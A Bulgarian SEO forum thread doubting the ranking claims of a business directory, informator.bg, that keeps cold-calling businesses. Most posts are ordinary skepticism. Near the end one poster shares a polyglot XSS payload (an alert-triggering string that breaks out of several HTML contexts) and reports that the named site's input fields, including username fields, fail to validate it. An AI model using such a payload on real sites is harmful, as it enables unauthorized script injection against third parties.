Някой с информация за информатор.бг

СЕО БГ

Well-Known Member
Не престават да звънят на мен, на мои клиенти и на приятели с бизнес за да предлагат услугите си. Пишат и безброй имейли с уникум оферти.... ДОбре сега, аз да питам някой имал ли е общо с тях, наистина ли имат доста ключови думи в топ ? :D
И наистина ли ( цитирам част от техен имейл )
Доказана фирма сме с 16 годишен опит,поддържаме добри позиции с бизнес сайта ни informator bg , като подаваме информация за над 30 000 фирми и частни лица в цяла България. Според статистиката ,която водим имаме повече от 500 000 посещения само за месец.
Сайтът ни е така устроен,че при търсене на дадена фирма,услуга(продукт) или дори по ключова дума излиза актуална информация, която със сигурност ще удовлетвори нуждите на клиента. ?!?!?!?!?!?!?!


Защото аз никога, не съм им срещал сайта по ключови думи, каквито и да е в разнообразните търсеняи които правя... :D :D :D
 
Аз процедирам така - ако някой ме търси да си рекламира бизнеса, значи не струва. Ако бизнеса му е толкова добър, за колкото се обяснява, хората ще го намират сами.
 
Аз пък бих им предложил да ми класират ключова дума и след това да се договорим.. за целта не е важно дали сайта е мой.. да ми каже Х сайт по Х дума ще го класираме на топ 5 за 1-2-3 месеца.. И когато го постигнат може да започнем преговори.
 
f2ef836aa3078286790f2eb6f2c1bee7.png


payload:

Код:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Нямат и еднин читав input text, който да се валидира, сайта им трещи alerts даже и в username fields...
 
Последно редактирано:

Горе